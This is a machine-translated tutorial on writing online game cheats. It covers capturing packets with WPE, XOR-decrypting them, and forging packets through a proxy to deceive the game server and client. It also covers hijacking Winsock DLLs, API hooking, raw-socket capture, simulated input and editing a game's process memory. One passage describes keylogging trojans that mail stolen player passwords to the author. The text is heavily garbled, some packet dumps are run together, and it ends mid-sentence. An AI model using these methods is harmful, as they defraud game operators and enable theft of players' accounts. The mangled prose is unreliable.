If you want to make a hundred battles in the modification of the game, it is necessary to have a quite rich computer knowledge. There are many computer masters to play games, modify the game, and gradually produce a strong interest in the computer, gradually grow up. Don't envy others can do it, because others can do it! I believe that after reading this tutorial, there will be a new understanding of the game, huh, because I am a good teacher! (Don't take the egg, hurt! # ¥% ... *) But want to learn knowledge from the modification of the game, increase your computer level, can not just modify the game! To know, modifying the game is just a place to verify that some computer knowledge you know, you can only give you some discovery questions, solve the opportunity to solve the problem, can only help you improve your interest in learning computers And it is not a way to learn the shortcut. One: What is hanging? Nowadays, online games are based on Internet access client / server mode. The server program runs on the game server. The game designer creates a huge game space, and players from all over the game can be logged in to the game by running client programs. . Simply put, online games actually provide a game environment by game developers, while players are relative free and openly in this environment. So since there is a server in the online game, we used to modify the game method for power. Remember that we have changed the various properties of the role in a single-machine version of the game, which is invited by memory search, which is not used in the online game. Because the various properties and various important information we played in online games are stored on the server, on our own machine (client) just displays the status of the role, so through the modification of the role in the client memory The species is unrealistic. So, don't we do any way to reach our modification in online games? The answer is "No". We know communication of Internet Customer / Server Mode Generally adopted TCP / IP communication protocols. Data exchange is implemented through the transmission of IP packets. Generally, our clients send certain requests to the server, such as mobile, combat and other instructions. It is switched through the form of the package and the server. Then we call the local news called Send, meaning to send data, after the server receives our Send, feedback the relevant information to the client, such as moving coordinates, and the type of battle. Then we collect the information sent by the client from the server called Recv. I know this truth, the work we have to do is to analyze the data between the client and the server (that is, the package) so that we can extract the data to us, and then simulate the server to the client. Or the simulated client is sent to the server so that we can implement the purpose of our modification. In addition to modifying the game packages to achieve the purpose of modifying the game, we can also modify the client's related procedures to meet our requirements. We know that the calculation capacity of each server is limited, especially in the game, the game server wants to calculate all the players in the game, so there are some operations to rely on our clients to complete, this is given We modify the game to provide some convenience. For example, we can detect the client program to find some programs to discover the branch. We can remove some of our unfavorable judgments to meet the needs of us to modify the game. In the next few chapters, we will tell you the concept of the package, and modify the relevant knowledge of the client.
Are you ready? Game data format and storage: Before conducting our work, we need to master some knowledge of the storage data in your computer and the characteristics of storage data in the game. This chapter is to provide a player who is provided to the rookie. If you are a master, you can skip. If you want to be an invincible swordsman, then you will spend some time; if, you just want to make a If the tourists of the rivers and lakes, then these things understand whether there is nothing to do. Is it a sword, or a tourist, you choose! Now we start! First, you have to know several formats in the game, these formats are: bytes, words (word), double words, or 8 bits, 16-bit, and 32-bit storage. the way. The byte is also a number of 0 to 255. The word or the 16-bit storage mode can store the number of 0 ~ 65535; the double word is 32-bit way to store 0 ~ 4294967295. Why do you want to understand this knowledge? The maximum value of various parameters in the game is different, and some may be enough 100 or so, for example, the level of the role in Jin Yong Qun Xia Chuan, the number of enemies, etc. Some of them need more than 255 or even greater than 65535, and the money value of the role in Jin Yong Qun Xia can reach millions. Therefore, the type of different data in the game is different. When we modify the game, you need to find a package that is prepared to modify, in which case the type of data correctly determines is an important condition for quickly finding the correct address. In the computer, data is based on bytes, each byte being given a number to determine the position of each. This number should be called address. When you need to use a word or double word, the computer makes a word with a continuous two bytes, and two consecutive words form a double word. And the address of a word or double word is the address of their low byte. Now that our usual Windows 9x operating system is represented by a 32-bit binary number. When we usually use the memory address, it always uses an 8-bit 16-based number to represent it. What is the binary and hexadecimal? Simply put, the number of binary is only 0 and 1 two digital, and each of the counting carrying encompacters. Similarly, the 16 credit is a count carrying method for every sixteen. 16 Entering 0 - f sixteen numbers, which uses the numbers of Ten to 15 using the numbers of A, B, C, D, E, F, and the correspondence between them and the decade is: a corresponds to 10, B correspond to 11, C correspond to 12, D correspond to 13, E correspond to 14, F corresponds to 15. Moreover, there is a simple correspondence between the 16-based number and the binary number, that is, the four-bit binary number is equivalent to a number of 16-based number. For example, a four-bit binary number 1111 is equivalent to 16-based f, 1010 is equivalent to A. Understanding these basic knowledge has a great help to modify the game, let's talk about this problem. Since the data is stored in the computer, the conversion relationship between the binary and the binary is very simple, so most modification tools displays 16-en-generated code when the data in the computer is displayed. You also need to enter 16-based numbers when you modify. Are you clear? The data seen in the game can be decimal. When you want to find and modify the value of the parameter, you can use the calculator provided by Windows to perform decimal and 16-based translation, we can be in the program group in the start menu. Find it in the attachment. The knowledge you have to know now is almost the same! However, there is a problem to pay attention to in the game modification. The storage method of data in the computer is typically stored in the low byte, and the high number is stored in the high byte.
For example, the decimal number 41715 is converted to a 16-based number A2F3, but this number is stored as F3A2 in the computer. Have you seen the above content? Do you understand the relevant relationship between the storage and data of the data? Ok, let's tell everyone how you are in the game, come! Everyone rolls the sleeves and let us work! Second: What is a package? How to cut a package package? How to check the IP address and port number of the game server? Internet users use various information services, the information of its communication can ultimately be attributed to information transfer in units of IP, and the IP package includes information to be sent to the destination IP address. The source IP address sent by the information, as well as some related control information. When a router receives an IP packet, it will find the routing table according to the destination IP address item in the packet, and send this IP packet to the corresponding port based on the results of the lookup. The next IP router will continue to forward after receiving this packet until it is sent to the destination. Routers can be exchanged for routing information between routing protocols, thereby updating the routing table. Then we care about data information in the IP package, we can use many listening networks to intercept the exchange data between the client and the server, and you will introduce one of the tools: WPE. WPE Usage: Execute WPE There will be the following features to choose: Select Game Select the program you want to intercept in your memory, you only need to double-click the program name. Trace tracking function. Used to track packets sent by the capture. WPE must first complete the program name of the program to track, you can use this item. Press the PLAY key to open the package. You can press at any time | | Pause Track, please press again | |. Pressing the square to stop capturing packets and display all captured packages. If you do not press the square stop button, the tracking action will automatically stop according to the set value in the option. If you don't pick it up, try to adjust the Option to Winsock Version 2. WPE and Trainers are set to display at least 16 bits colors. Filter filtering function. It is used to analyze the packet captured and modified. Send Packet Sends a packet feature. Ability to give you a false package. Trainer Maker makes a modifier. Options setting function. Let you adjust some of WPE's setpoint. Filter's detailed teaching - When Filter is started, the button button will present red. - When you start Filter, you can close this window at any time. Filter will remain in the original state until you press the ON / OFF button again. - Only the Filter Enable button is in the state of OFF to check the box before the Filter is selected to edit the modification. - When you want to edit a Filter, just double click on the name of the file. Normal Mode: Example: When you are in the Strip Fighter Online, you use two fireballs and hit the other party. At this time, you will get the following package: send-> 0000 08 14 21 06 01 04 Send-> 0000 02 09 87 00 00 00 00 sent-> 0000 03 84 11 09 11 09 Send-> 0000 0A 09 C1 10 00 00 FF 52 44 Send-> 0000 0A 09 C1 10 00 00 66 52 44 Your first fireball makes the other party reduce 16 drops of 16 = 10h ﹞ ﹞, and you observed that the 4th level of the 5th packet appeared, It should be here.
You observed that 0A 09 C1 before 10h did not change in both packets, and it was obvious that these three values were the key to playing a fireball. Therefore, you will fill in the 0A 09 C1 10 in the search column Search, and then fill in FF in the position 4 of the modified column Modify ﹞. As a result, when you send a fireball again, FF will replace the previous 10, which is a fireball of 255! Advanced Mode: Sample: When you are in a game, you don't want to use the real name, you want to transfer to each other with a modified fake name. After you use Trace, you will find some of your names in some packages. Suppose your name is Shadow, converted into a 16-in-one, ﹝ 53 68 61 64 6f 77 ﹞; and you plan to replace him with Moon ﹝ 6d 6f 6f 6e 20 20. Send-> 0000 08 14 21 06 01 04 Send-> 0000 01 06 99 53 68 61 64 6F 77 00 01 05 Send-> 0000 03 84 11 09 11 09 Send-> 0000 0A 09 C1 10 00 53 68 61 64 6F 77 00 11 Send-> 0000 0A 09 C1 10 00 00 66 52 44 But you look carefully, your name is not in the same location in each packet - in the second packet, the name appears in the first 4 positions - In the 4th packet, the name appears in the 6th position, you need to use Advanced Mode - You are in searching: 53 68 61 64 6f 77 ﹝ Be sure to fill from the position 1 - You want to replace the new name from the original name Shadow, so you have to choose from the position of the value being discovered to start replace the continuous value ﹝ from the position of the chain found ﹞ . - Now, in the position of the modification column modify ﹞ 000, the 6D 6F 6F 6e 20 20 is now the corresponding position, that is, from the original search bar 001 position to start a hand - if you want to packet A location is modified, please select ﹝ from the beginning of the packet. People know that the TCP / IP protocol common sense knows that the Internet is transferred after the information data is packaged. Each packet is divided into two parts: header information and data information. The header information includes the transmission address of the packet and the arrival address, and the like. Data information includes all information we are related to the operations in the game. Then we must know various information such as the IP address and port number of the game server before doing the process of seating the package. In fact, it is the easiest to see if there is a Server.ini configuration file. You can view the IP address of a game server. For example, Jin Yong Qun Xia Chuan is the case, then in addition to this, we can use netstat in DOS, the network connection, routing table, and network interface information, You can let users know which network connections are working. Or you can use tools such as Trojan to view the network connection. Tools are very much, see which one you like. The general format of the netstat command is: The meaning of each option in the NetStat [Options] command is as follows: -a Displays all sockets, including listening. -c is redisplayed every 1 second until the user interrupts it. -i Displays information about all network interfaces. -n replaces the name in the network IP address, showing the network connection situation. -r Displays the core route table, formats with "route -e". -t shows the connection of the TCP protocol. -u Displays the connection of the UDP protocol. -v displays working in progress.
Three: How to analyze our intercepted packet? First we save WPE intercepted packets as text files, then open it, then see the following data (here we use the data sent by the PK shop in Jin Yong Qun Xia to explain as an example): The first file : Send-> 0000 e6 56 0D 22 7e 6b E4 17 13 12 13 12 13 67 1Bsend-> 0010 17 12 DD 34 12 12 12 12 17 12 12 12 12 12 9Bsend-> 0000 E6 56 1e F1 29 06 17 12 3B 0e 17 1ASend-> 0000 E6 56 1B C0 68 12 12 12 5ASend-> 0000 E6 56 02 C8 13 C9 7E 6B E4 17 10 35 27 13 12 12send-> 0000 E6 56 17 C9 12 Second File: Send- > 0000 83 33 68 47 1B 0e 81 72 76 77 77 77 77 77 77 07 1C 77 77 77 77 72 77 72 77 77 77 6Dsend-> 0000 83 33 7B 94 4C 63 72 77 5E 6B 72 F3send-> 0000 83 33 7e A5 21 77 77 77 3fsend-> 0000 83 33 67 AD 76 CF 1B 0e 81 72 75 50 42 76 77 77send-> 0000 83 33 72 AC 77 We found that two PK shop small two data formats However, the content is not the same, we are the same NPC of PK, why will it be different? The package of Jin Yong Qun Xia Chuan is transmitted on the Internet. Then we face the problem to decrypt the secret text to make a clear text. Because the general packet encryption is different or the operation, this will talk about what is different or. Simply put, the same is "the same is 0, and it is 1" (this is for binary bitwise), and an example, 0001 and 0010 are different or, our bit by bit, the difference is 0011, The calculated method is that the fourth bit of the 4th bit of 0001 is 0, which is the same, and the 4th place of the different or the result is "the same as 0, different 1", the first 0,0001 The third bit of 3 bits of 0,0010 is 0, the third bit of the different or the result is 1 of 0,0001, the second bit of 0,0010 is 1, then the second place of the different or the result is 1 The first bit of 1,0010 of 0001 is 0, then the first bit of the different or the result is 1, and the combination is 0011. The different or the operation will encounter a lot in the future, everyone can be familiar with familiarity, skilled in the analysis.
Below we continue to look at the above two files, according to the common sense, the data of the packet is not all value, the game development will reserve some byte space to facilitate the future expansion, that is, the packet will exist. Some "00" bytes, observe the above documents, we will find a lot of "12" in the document, and there are many "77" in the file, then this is the "00" of us? We start to act! We divide the documents with "12" different or the document two and "77" are different or, of course, use the hand to work very much, we use the "M2M 1.0 Encrypted Packet Analysis Tool" to be more convenient. The following results were obtained: The first file: SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 892 SEND- > 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 083 Send-> 0000 F4 44 09 D2 7A 00 00 00 00 484 Send-> 0000 F4 44 10 da 01 DB 6C 79 F6 05 02 27 35 01 005 Send-> 0000 F4 44 05 db 00 second file: send-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09send-> 0010 05 00 00 00 00 00 00 05 00 05 00 00 1A2 Send -> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 843 Send-> 0000 F4 44 09 D2 56 00 00 00 484 Send-> 0000 F4 44 10 da 01 b8 6c 79 F6 05 02 27 35 01 00 005 Send- > 0000 F4 44 05 db 00, this one of the two files are the same, indicating that our reasoning is correct, the above is the plain text we need! Next is to understand the meaning representing some key bytes, which requires a large number of data to analyze. First we will find that each packet begins with "F4 44", and the third byte is changing, but the change is very regular. Let's take a look at the length of each package. I found out? Yes, the third byte is the length of the package! By intercepting a large number of data packets, we judge the 4th byte representative instruction, that is, what is the operation of the client tells the server. For example, to the server requesting the battle command is "30", the movement command is "D4" in the battle. Next, we need to analyze the first package above "F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09 05 00 CF 26 00 00 00 05 00 1C 00 00 00 89", in this package What information is included? Which NPC you should notify the server, let's find what the code is looking for this store.
We re-PK a little Lu Luo (that is, the one outside the Dali Inn): send-> 0000 F4 44 1F 30 D4 75 F6 05 01 01 00 01 00 01 75 09 Send-> 0010 05 00 8A 19 00 00 00 00 00 11 00 02 00 00 00 C0 We are analyzed according to common sense, although the NPC species in the game will not exceed 65535 (FFFF), but will not limit the scope of the word when developing, so that we are expanding, so we are in double words Look in. By comparing the two packages of "small two" and "small Luo Luo", we put the goal in "6C 79 F6 05" and "CF 26 00 00". (It is easy to compare, but you can't be too late, huh, we will look at the back package, in the back bag, there should be an NPC code, such as mobile package, game allowance, server must know NPC mobile coordinates, broadcasting other players to watch the battle. In the back 4th package "Send-> 0000 F4 44 10 da 01 DB 6C 79 F6 05 02 27 35 01 00 00" We also saw "6C 79 F6 05", the code in the initial discord store is it! (This analysis contains a lot of work, you can use WPE cut data from tax analysis) The first package analysis is temporarily here (there are still information, we don't need to clearly ", we look at 4 packs "Send-> 0000 F4 44 10 da 01 DB 6C 79 F6 05 02 27 35 01 00 00", then cut the PK yellow dog's bag, (the dog will come out 2 oh) look at the format: Send- > 0000 F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00send-> 0010 EB 03 F8 05 02 27 36 01 00 00 According to the above analysis, the yellow dog's code is "4b 7d F6 05" (100040011) However, how is the two yellow dog servers distinguished? Look at "EB 03 F8 05" (100140011), it is the last code plus 100,000, huh, so that the server can recognize two yellow dogs. We have confirmed that the packets intercepted by the enemy through the wild. Sure enough. Then, the format of this package should be more clear: the third byte is the length of the package, "DA" is instruction, the 5th byte is NPC, 10 bytes starting from the 7th byte representative An NPC information, more NPCs, more than 10 bytes. If you play the net gold, you will inevitably know that the randomness sometimes has a reinforcement, and we use the game to reinforce the NPC for each battle. By adding a package in the battle, we will find the server side to send such a package: F4 44 12 E9 EB 03 F8 05 02 00 00 00 00 00 00 00 5 - 8th byte NPC's code (here we are simply illustrated by the yellow dog code).
So, we use stand-alone proxy technology to deceive clients and servers at the same time! Ok, the work of calling NPC is a short half, the next thing, how to modify the package and send the package, let's continue explanation next section. Four: How to pretend to "client" to "server" to send us the package we need? Here we need to use a tool, which is between the client and the server side, and its work is to receive and forward the packet, which we call it a proxy. If the agent's work is simple to receive and forward, this is meaningless, but please note: All packets must be transmitted through it, and the meaning here is significant. We can analyze the received packets or forward them directly, or modify forward, or press the packets we need to send. Below we continue how to cheat the server and client at the same time, that is, modify the package and forgery packages. Through our previous analysis, we already know how to play multiple NPC package formats, then we will do it! First we have to find the package sent by the client, find the feature of the battle, is the first package of the request battle, we find "F4 44 1F 30" character, this is not changed, of course, it is necessary to decrypt. After found, it means that the client will ask the server to ask the server, we don't move this package, forward. Continue to find down, then the signature that needs to be found is not good, let's find "Da" first, this is the directive of the client to send NPC information, then there may be "Da", there is no relationship, we look The first three bytes do not have "F4 44". After finding it, our work begins! We determine the NPC number to be hit. This quantity is not very big. The reason is that the package length of the net gold is indicated by a byte. Then a package can have 255 bytes, we have analyzed it, adding an NPC to add 10 bytes, so everyone is counted. It is appropriate to play 20 NPCs. Then we have to calculate the original NPC code analysis of the client, because the added NPC code should add 100000. Calculate our increased NPC code, and combine into a new package, pay attention to the byte representing the length of the package to modify, then forward to the server, this step should pay attention to the algorithm when writing the program, do not cause a large delay. Above we deceive the server ended, the deception of the client is simple. After sending the above package, we will send it to the client according to the new NPC code construction package. The format is "F4 44 12 E9 NPC code 02 00 00 00 00 00 00 00 00", putting each new NPC Constructing such a package, sequentially send it together to the client in order, the client is also deceived, very simple. In the future, there will be other things in the battle, we will not be able to open it. The basic principle of the game plug-in has deeply influenced many online game players. Today, I saw some techniques about the game plug-in writing, so they reprinted for the reference 1. The original intensity of the game plug-in is now divided into many kinds. For example, the mouse, modify the packet, and modify the local memory, but it seems that there is no modification of the server memory, huh, huh. In fact, modifying the server is also a way, but the technology is too high, there is no way to start.
(For example, please give the GM to night club, gift, money, etc. can modify server data, haha) modifying the game is nothing more than modifying the data of local memory, or intercepting API functions, etc. Here I will introduce the methods you can think of, I hope everyone can make good plug-in to make game manufacturers better improve their own technology. I have seen an article is the theoretical analysis of magic baby, write a lot, probably that look. I will explain the technical things in order to make the use of jade. 2 Technical Analysis Sections 2.1 In response to the keyboard or mouse We are generally used: uint sendinput (uint ninputs, // count of inputs lpint pinputs, // array of structure); API function. The first parameter is the dimension of the matrix of the second parameter. The second parameter contains a response event. This is the first to fill, and finally this structure is very simple, this is the simplest method to simulate the keyboard. Mouse, huh, huh. Note that this function has an alternative function: void keybd_event (byte BVK, // Virtual key code BYTE BSCAN, / / scanning code DWORD DWFLAGS, ULONG_PTR DWEXTRAINFO // Additional key status); with void mouse_event (dword dwflags, //motion And Click Options DWORD DX, // Horizontal Position Or Change Dword Dy, // Vertical Position Or Change Dword Dwdata, // Wheel Movement Ulong_ptr DWEXTRAINFO // Application-Defined Information; these two functions are very simple, I think the buttons The elf is this. The above is an analog keyboard, the following is an analog mouse. This is just an analog part, you have to contact the game we need to find the game's window, or contain shortcuts, just like the activation key of the button, we can use the getWindow function to enumerate the window, or use FindWindow Function to find a developed window (note, there is a findwindowex), FindWindowEx can find the child window of the window, such as buttons, what to wait. When the game switches the scene, we can use FindWindowEx to determine some of the characteristics of the current window, thus judge whether it is still in this scenario, such as getwindowInfo to determine something, such as when you find a button, you will explain The game scene has been switched, and so on. Some games have no controls inside, which is to change the image to the image, this method is limited. This requires us to use other ways to assist in analyzing. As for the shortcut, we have to be implemented with a dynamic connection library, and it is also very simple to use the Hook technology. Everyone maybe, it is actually a global HOOK object and then setwindowhook is OK, and the callback function is ready, and now the online example is more like a humm. This implementation is already very common in plug-in. If anyone else doesn't understand, let's take a look at MSDN Find SetWindowHook.
Don't underestimate the role of this dynamic connection library, it can be cut into all process space, that is, you can load it into all games, as long as you use it, you will find it very use. This requires you to review the basics of Win32 programming. Oh, hurry to read the book. 2.2 Intercept messages Some game response mechanisms are relatively simple, based on messages, or what timer is used. At this time you can use intercept messages to implement some interesting features. We intercept messaging is also hook technology, including keyboard messages, mouse messages, system messages, logs, etc., other things have nothing to do, we only use the callback function of intercepting messages, this will not let I wrote an example. In fact, this is the same as the above, it is written in SETWINDOWHOOK, and you will understand very simple. As for what to intercept, you are your business, such as handling some of our data judgment in each timer message, or in the timer to simulate a timer, then some data will handle twice, huh, huh. The consequences, not necessarily a good thing, huh, huh, but if the data calculation is placed on the client, you can really change the data, huh, try it. There are still a lot of use, you can think of it, huh, huh. 2.3 Intercepting the Socket package This technology is much difficult than the original. First we have to replace WINSOCK.DLL or WINSOCK32.DLL, we write the replacement function to be consistent with the original function, that is, what is its function output, and we also have to output what is like a function, but also parameters, parameter sequence All must be just the same, then call the function in the true Winsock32.dll in our function. First of all: We can replace dynamic libraries to system paths. Second: When our application starts, the original dynamic library can be loaded, and then use this function loadLibary and locate the entry to get the entry address of each real socket function with the getProcAddress function. When the game is going, it will call our dynamic library, then jump to the true dynamic library after processing from our dynamic library, so we can handle your own data in it, it should be all data . Oh, excitement, intercept the packet, we have to analyze the correct response, don't think that this work is completed, it is early. After the analysis is completed, we also want to simulate the answer mechanism to communicate with the server, one accidental will be sealed. The analysis data is the source of workload. The game will have a change in the way. Therefore, we should write out the people who are desperate, and they are fooled. 2.4 Intercepting the technology above the API If we can use it flexibly, we don't have to intercept the API function, in fact, this technology is a supplementary technology. For example, we need to intercept socket as our use, we must use this technology, in fact, we can also use it directly to directly intercept the function in the socket, which is more direct. Now that the tutorial of the API is everywhere, I don't list, the method of the comparative habits I use is to intercept according to the input festival, this method can be used on any operating system, such as windows 98/2000, etc. The method is not cross-platform, I don't recommend it. This technology can learn from the contents of the 545 pages of "Windows Core Programming", if the Win98 system can use the last chapter of the "Windows System Mystery" to learn. The online game plug-in core package reveals the online game packaging technology is one of the concerns of most programming enthusiasts, let us study this question with more programming enthusiasts.
Don't look at this problem, but it is very popular in technology, and there are many ways to achieve (for example, APIHOK, VXD, Winsock2 can be implemented), where we cannot be involved in each technology and method, so I will explain a detailed explanation of Winsock2 technology, even if I have a throwing brick. Since most readers are not well understood, I will introduce related knowledge here: APIHOOK: Since Windows provides the functionality provided by Windows to the API, everyone must pass the API, in other words It is to say that we have to capture the data package, you must have to know and capture this API, get the package information from the API. Vxd: Directly achieve the capture of the package information directly by controlling the VXD driver, but VXD can only be used for Win9x. Winsock2: Winsock is Windows network programming interface, Winsock works in the application layer, which provides high-level data transfer programming interfaces that are independent of the underlying transfer protocol, Winsock2 is the service provider interface provided by Winsock 2.0, but can only be used in Win2000. Ok, let's start entering WinSock2 blocking programming. In the package programming, I am ready to be divided into two steps: 1. Capture of the package, 2, the sector of the package. First of all, we have to achieve the capture of the package: the Winsock of Delphi package is 1.0, very natural Winsock2 is not used. If you want to use Winsock2, we have to make an interface to Winsock2 in Delphi, you can use Winsock2. 1. How do I do WINSOCK2 interface? 1) We must first define the type used by Winsock 2.0, where we do a demonstration in the WSA_DATA type, you can give a three-to-use package.
We must know that the WSA_Data type will be used for WSAStartup (WSData: TWSADATA): Integer;, you will find that WSDATA is a reference parameter. In the incoming parameter, the number of variables is the address of the variable, so we do the following for WSA_DATA. package: const WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; type PWSA_DATA = ^ TWSA_DATA; WSA_DATA = record wVersion: Word; wHighVersion: Word; szDescription: array [0..WSADESCRIPTION_LEN] of Char; szSystemStatus: array [0..WSASYS_STATUS_LEN] of char; iMaxSockets: Word; iMaxUdpDg: Word; lpVendorInfo: PChar; end; TWSA_DATA = WSA_DATA; 2) we need to introduce WS2_32.DLL function winsock2, and we are also here to make an example WSAStartup function introduction: function WSAStartup (wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; implementation const WinSocket2 = 'WS2_32.DLL'; function WSAStartup; external winsocket name 'WSAStartup'; by the above method, we can do winsock2 interface, here we can use winsock2 It's a packet capture, but you must have a network card. Because we involve a security problem that is working, we are here as an IP packet as an example, if you are not very clear, please check MSDN: 1) We want to boot WSA, this when a use to WSAStartup function, used as follows: INTEGER WSAStartup (wVersionRequired: word, WSData: TWSA_DATA); 2) obtained using the socket function socket handle, m_hSocket: = socket (AF_INET, SOCK_RAW, IPPROTO_IP); used as follows: INTEGER socket (AF: INTEGER, STRUCT: INTEGER, Protocol: integer; m_hsocket: = socket (AF_INET, SOCK_RAW, IPPROTO_IP); M_HSocket is the Socket handle, AF_INET, SOCK_RAW, IPPROTO_IP constant.
3) Define the SOCK_ADDR type, with our network card IP to the SOCK_ADDR type, then we use the bind function to bind our NIC, the Bind function is as follows: type in_addr = record s_addr: pchar; end; type tsock_addr = record sin_family : Word; sin_port: Word; sin_addr: IN_ADDRsin_zero: array [0..7] of Char; End; varLocalAddr: TSOCK_ADDR; LocalAddr.sin_family: = AF_INET; LocalAddr.sin_port: = 0; LocalAddr.sin_addr.S_addr: = inet_addr ( '192.168.1.1'); // Here your own network card IP address, and inet_addr this function is a function of Winsock2. bind (m_hSocket, LocalAddr, sizeof (LocalAddr)); 4) with WSAIoctl to register the input-output component WSA, which is used as follows: INTEGER WSAIoctl (s: INTEGER, dwIoControlCode: INTEGER, lpvInBuffer: INTEGER, cbInBuffer: INTEGER, lpvOutBuffer: INTEGER , CBoutBuffer: Integer, INTEGER, LPOVERLAPPED: Integer, LPCompletionRoutine: Integer; 5) The next time the cycle is done in the dead circulation block to achieve the data reception. However, the middle of the ring should be delayed in Sleep (), otherwise the program will be wrong. 6) In the circulation block, use the RECV function to receive data, the RECV function is as follows: Integer Recv (S: Integer, Buffer: array [0..4095] of Byte, Length: Integer, Flags: integer,); 7) In Buffer is the data we receive, if we want to know where the data is sent, then we want to define a certain IP package structure, use copymemory () to read the IP information from buffer, However, it is read out that hexadecimal data needs to be converted. I looked at the package captured, it was a little start, but I have to tell you that the package is very easy, but many game packages are encrypted, if you want to figure out What is what you need to packet decryption. Four online game plug-in design methods I saw someone else playing online games, I was uncomfortable for the programmer, I would like to figure out what is going on. I took some to study, I have a personal experience, and I will share it with everyone. I don't have a few more ways (according to the difficulty of production): 1, action, so-called action, means using the API send command to the window or API control Mouse, keyboard, etc., so that the characters in the game flow or attack, the earliest "stone" plug-in is this way.
(This plug-in is entirely garbage, TMD, as long as people who will know some API know what to do, but this plug-in is also entrance-level good stuff, although you can't improve your combat power, but you can improve your morale) 2 Local modification, this plug-in has some of the traditional game modifiers, doing this plug-in programming only a little understanding of the memory address and master the API can be realized, "Elf" is this way. Written, it is difficult to find those address code, find the address, usually to use the tools of others, some games have two-code check, is looking for more difficult. (This plug-in is more difficult than the previous one, but this plug-in can be used, it is also difficult ~~, this plug-in can quickly improve your understanding and application of memory address, it is you The programming technology is a good Dongdong) 3, Trojan, this plug-in purpose is to help the plug-in producer to steal the user's password (TMD, "bad" is a word, but you have to know that it is known to talk about it ~ ~), Doing this plug-in, there is a certain difficulty, you need hook or keyboard monitoring technology to make a foundation can be done, its principle is first cutting the user's account or password, and then send it to the specified mailbox. (I have written such a stuff before, but I have never used it. I know that this kind of Dongdong is very unethical, so don't use it in the future!) 4, accelerate, this plug-in can speed up the speed of the game ... (I am sorry for everyone, I don't actually have done it, so I can't be self-suited, I'm embarrassed, the first three can be better implemented in languages such as VB, Delphi, and then use VC. The next layer supports a better programming tool. The action plug-in first, first talk about the plug-in plug-in, which is the easiest way to do when I first write.
I remember that I was still in the "Stone" era, I saw that someone hang a software (plug-in), I could go four outsight (I didn't know how to hang it outside), so I found this software ( After taking it, I listened to someone to say this. This is not difficult to realize it. It is not difficult to realize it. It is not difficult to see that in fact the people's walking is not the mouse, and it will be achieved. The impulsive impulsive, then ran to the MSDN and see some information, found this kind of function, only a few simple API functions can be done: 1, first we have to know the position of the mouse (for easy reducing now The location of the mouse is to use the API function getCursorpos, which uses the following: BOOL getCursorpos (LPPoint LPPOINT / / Address of Structure for Cursor Position; 2, we move the position of the mouse to the person On the place, we will use the setcursorpos function to move the mouse position, which is used as follows: BOOL setCursorpos (int X, // horizontal position int y // vertical position); 3, the analog mouse issues a button to press and release We want to use the mouse_event function to implement, use the method of use Next: void mouse_event (DWORD DWFLAGS, // Flags Specifying Various Motion / CLICK VARIANTSDWORD DX, // Horizontal Mouse Position Or Position ChangedWord Dy, // Vertical Mouse Position OR position changeDWORD dwData, // amount of wheel movementDWORD dwExtraInfo // 32 bits of application-defined information); dwFlags in its place, many of the available events such as mobile MOUSEEVENTF_MOVE, left button down MOUSEEVENTF_LEFTDOWN, left release MOUSEEVENTF_LEFTUP, specific Dongdong still checks MSDN ~~~~~ Ok, with the previous knowledge, we can take a look at how people remove: getCursorpos (Point); setcursorpos (RAN Point (80, Windowx), Ranpoint (80, Windowy)); // Ranpoint is a homemade random coordinate function mouse_event (MouseEventf_leftdown, 0,0,0,0); mouse_event (MouseEventf_leftup, 0,0,0,0); SetCursorpos (POINT.X, POINT.Y); Look at the above code, is it very simple to see the characters? ~~ Said, TMD, this is the practice of garbage, I believe it ~~~), next, then look at the automatic attacking practice in the game (required to attack the shortcut button in the game), the truth is still the same, just The API is different ~~~, this time we want to use the keybd_event function, the usage is as follows:
VOID keybd_event (BYTE bVk, // virtual-key codeBYTE bScan, // hardware scan codeDWORD dwFlags, // flags specifying various function optionsDWORD dwExtraInfo // additional data associated with keystroke); we have to know the scan code can not be used directly to Use the function mappvirtualkey to turn the key value to the scanning code, the specific usage of MapVirtualKey is as follows: uint mapvirtualkey (uint ucode, // virtual-key code or scan code umaptype // translation to perform); Ok, ratio said fast button Is Ctrl A, let us see how the actual code is written: keybd_event (vk_control, mapvirtualkey (vk_control, 0), 0, 0); keybd_event (65, MapVirtualKey (65, 0), 0, 0); KeyBD_EVENT (65, MapVirtualKey (65, 0), keyeventf_keyup, 0); keybd_event (vk_control, mapvirtualkey (vk_control, 0), keyeventf_keyup, 0); first analog to press the CTRL button, then simulate the A key, then simulate Open the A key, finally release the Ctrl key, which is a cycle that simulates the shortcut. (Seeing this, almost a certain understanding of the simple exterior ~~~~ Do you try? If you give an imitation, you can have a better Dongdong, this is going to see your comprehension. ~~, but don't be happy too early this, there is a more complex Dongdong waiting for you ~~) Local modified plug-in now, let's take a look, more plug-in plug-in - local modification The entire production process of type hanged is detailed.
I know that the most typical application of local modified plug-in is to play on the "Elf" game, because I am in recent years ("Elf" is still in the test stage), there are many colleagues in my company to play "Elf". So I looked at the data processing method of the game. I found that the information it sent to the server was existing in memory (I got the first feeling: Modifying this game and modifying the stand-alone version of the game. In other words, it was possible to modify the memory address before he submitted information to the server). At that time, I found that the address was changed, and sure, according to my idea, modified the address, so that the system was automatically submitted, it really succeeded. ~~~~~, later "Elf" changed to a double address school inspection, memory school inspection, etc., I will not have nonsense here ~~~~, ok, let's take a look at how this kind of plunks are made We have to have a specific understanding of Windows's memory before doing plug-in, and the memory we refers to the system's memory offset, which is relatively memory, and we have to modify it, then we To understand several Windows APIs, OK, follow examples Let us see this plug-in production and API application (in order to ensure the normal operation of online games, I don't explain the way the memory address is detailed): 1 First, we must use FindWindow, know the handle of the game window, because we have to know the ID of the process after the game is run, below is the usage of FindWindow: hWnd FindWindow (lpctstr lpClassName, // Pointer to class namelpctstr lpwindowname // pointer to window name); 2, we obtained GetWindowThreadProcessId game process corresponding to the window process ID, the function is used as follows: DWORD GetWindowThreadProcessId (HWND hWnd, // handle of windowLPDWORD lpdwProcessId // address of variable for process identifier); 3, to give After the game process ID, the next thing is to open the process with the highest permissions, the specific usage of the function OpenProcess used is as follows: Handle OpenProcess (DWORD DWDESIREDACCESS, // Access Flag Bool Binherithandle, 